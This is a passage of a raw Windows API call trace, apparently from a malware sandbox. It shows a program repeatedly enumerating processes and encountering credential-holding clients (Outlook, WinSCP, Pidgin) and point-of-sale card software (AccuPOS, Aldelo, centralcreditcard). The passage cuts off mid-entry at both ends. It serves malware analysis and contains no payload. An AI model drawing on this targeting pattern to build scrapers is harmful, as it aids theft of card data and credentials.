szExeFile="outlook.exe")) returned 1 [0276.071] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0276.076] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0276.078] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0276.080] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0276.082] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0276.084] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0276.086] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0276.087] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0276.139] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0276.141] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0276.143] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0276.145] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0276.147] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0276.149] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0276.150] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0276.155] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0276.157] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0276.159] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0276.161] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0276.163] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0276.165] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0276.169] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0276.171] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0276.173] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0276.174] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0276.176] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0276.178] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0276.179] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0276.181] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0276.261] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0276.271] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0276.273] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0276.275] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0276.280] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0276.281] CloseHandle (hObject=0x1d14) returned 1 [0276.281] Sleep (dwMilliseconds=0x64) [0276.416] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0276.530] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.532] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0276.533] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0276.535] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0276.536] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0276.538] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0276.540] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0276.541] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0276.545] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0276.546] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.548] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.549] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0276.550] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.552] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.553] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.555] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.556] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.605] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.643] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.645] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0276.646] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0276.648] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0276.649] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.650] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0276.655] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0276.657] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0276.658] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0276.659] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0276.661] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.662] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0276.663] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0276.665] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0276.666] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0276.671] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0276.672] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0276.673] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0276.675] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0276.676] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0276.677] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0276.679] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0276.680] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0276.681] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0276.775] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0276.776] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0276.778] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0276.779] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0276.781] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0276.782] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0276.784] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0276.785] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: 